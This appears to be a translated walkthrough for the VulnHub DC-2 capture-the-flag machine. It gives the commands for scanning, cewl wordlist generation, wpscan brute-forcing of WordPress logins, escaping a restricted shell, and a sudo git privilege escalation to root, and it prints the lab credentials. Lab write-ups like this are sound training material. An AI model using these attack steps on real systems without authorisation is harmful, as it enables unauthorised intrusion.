For details of DC-2, please visit: https://www.vulnhub.com/entry/dc-2,311/
Target machine environment VIrtualBox
, connected to the VirtualBox Host-Only
network card, IP:192.168.56.103
Attack machine environment VMware
, bridge mode, bridge to VIrtualBox Host-Only
network card, IP:192.168.56.177
Scan for surviving hosts in segment C
arp-scan -l
or
nmap -sP 192.168.56.1/24
Visit http://192.168.56.103
found to be redirected tohttp://dc-2
modify/etc/hosts
Nmap scans the target machine to collect information
nmap -Pn -sSV -A -p- -T5 192.168.56.103
Found on the site flag1
and prompted to usecewl
PS: It
Cewl
is an application developed by Ruby, which can return a dictionary file by crawling the URL address for use by blasting tools
Use cewl
crawl sites to generate dictionaries
cewl -w dc2_password.txt http://dc-2/
WPscan
Enumerate site users
wpscan --url http://dc-2/ -e u
Use the cewl
generated dictionary to blast
wpscan --url http://dc-2/ -P /home/mochu7/Desktop/dc2_password.txt --max-threads 100
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
Login to jerry
getflag2
tom
Account can log in with SSH
PS: The ssh port here is not the 22
previous port scan and it can be seen that the ssh port is7744
tom
User shell is restricted and many commands cannot be used
Read here flag3.txt
can be read by less
command, no need to escalate privilege
Use of rights:
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin
flag3
flag4
And the jerry
user can not log in before testing ssh, but you can switch directly here
According to flag4
the prompts, here should git
be an root
authorization , first check which commands can be used without a password, that is, sudo
can be executed without a password
The next step is git
to raise rights
Reference article: https://gtfobins.github.io/gtfobins/git/
sudo git -p help config
!/bin/sh
final-flag